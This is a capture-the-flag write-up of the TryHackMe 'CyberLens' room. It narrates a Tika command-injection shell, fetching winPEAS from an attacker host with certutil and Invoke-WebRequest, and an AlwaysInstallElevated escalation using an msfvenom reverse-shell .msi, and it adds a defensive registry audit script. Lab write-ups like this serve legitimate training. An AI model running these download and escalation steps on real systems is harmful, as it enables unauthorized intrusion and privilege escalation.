# THM-CyberLens



Scrolling down the web page, we can see a file upload.

I checked the source code to see how it works but stumbled into something interesting.

You can see there is another website on port 61777.

It’s running [Apache Tika 1.17](https://www.exploit-db.com/exploits/47208). A quick search on Google reveals that this version is vulnerable to command injection.
I use Metasploit to get a shell.



I use the shell to create a cmd session.


I upload winPEAS to the target machine:
```
certutil -urlcache -f http://10.6.4.204:1234/winPEAS.exe winpeas.exe
Invoke-WebRequest -Uri http://10.6.4.204:1234/winPEAS.exe -OutFile winpeas.exe
```



One interesting result I find is AlwaysInstallElevated. AlwaysInstallElevated is a Windows policy setting that permits Windows Installer packages (.msi files) to be installed with administrative privileges.
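From the defender's side, the same finding can be audited directly. The PowerShell below is an added example, not part of the original write-up: it assumes the standard policy location `SOFTWARE\Policies\Microsoft\Windows\Installer`, where the setting only takes effect when the value is 1 in both the machine (HKLM) and user (HKCU) hives.

```powershell
# Added example: audit the AlwaysInstallElevated policy on a Windows host.
# Assumption: run as the user whose HKCU hive should be checked; other users'
# hives (under HKEY_USERS) are not inspected here.
$subKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$name   = 'AlwaysInstallElevated'

function Get-PolicyValue {
    param([string]$Hive)   # 'HKLM' or 'HKCU'
    $path = "${Hive}:\$subKey"
    # A missing key or value means the policy is not configured in that hive.
    $item = Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$name
}

$results = foreach ($hive in 'HKLM', 'HKCU') {
    $value = Get-PolicyValue -Hive $hive
    [pscustomobject]@{
        Hive    = $hive
        Value   = if ($null -eq $value) { 'not set' } else { $value }
        Enabled = ($value -eq 1)
    }
}
$results | Format-Table -AutoSize

# The policy is effective only when both hives have the value set to 1.
if (@($results | Where-Object Enabled).Count -eq 2) {
    Write-Warning 'AlwaysInstallElevated is active: any user can install .msi packages with elevated privileges.'
    # Remediation: set the policy to Disabled / Not Configured in Group Policy,
    # or clear the values directly (HKLM requires an elevated session):
    # Set-ItemProperty -Path "HKLM:\$subKey" -Name $name -Value 0
    # Set-ItemProperty -Path "HKCU:\$subKey" -Name $name -Value 0
} else {
    Write-Output 'AlwaysInstallElevated is not effective for this user on this host.'
}
```

If the value is delivered by Group Policy, fix it in the GPO as well, otherwise the registry change is overwritten at the next policy refresh.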

Let's look it up on the internet; I find [this blog](https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/), which has a method to get root.
I use msfvenom to create a .msi file that opens a reverse shell.

I upload the file to the target machine.


After uploading the file, I run the command `msiexec /quiet /qn /i ignite.msi` to execute ignite.msi, making sure to use nc to catch the reverse shell.

I have gained SYSTEM privileges on the target, meaning I can now do anything I want.
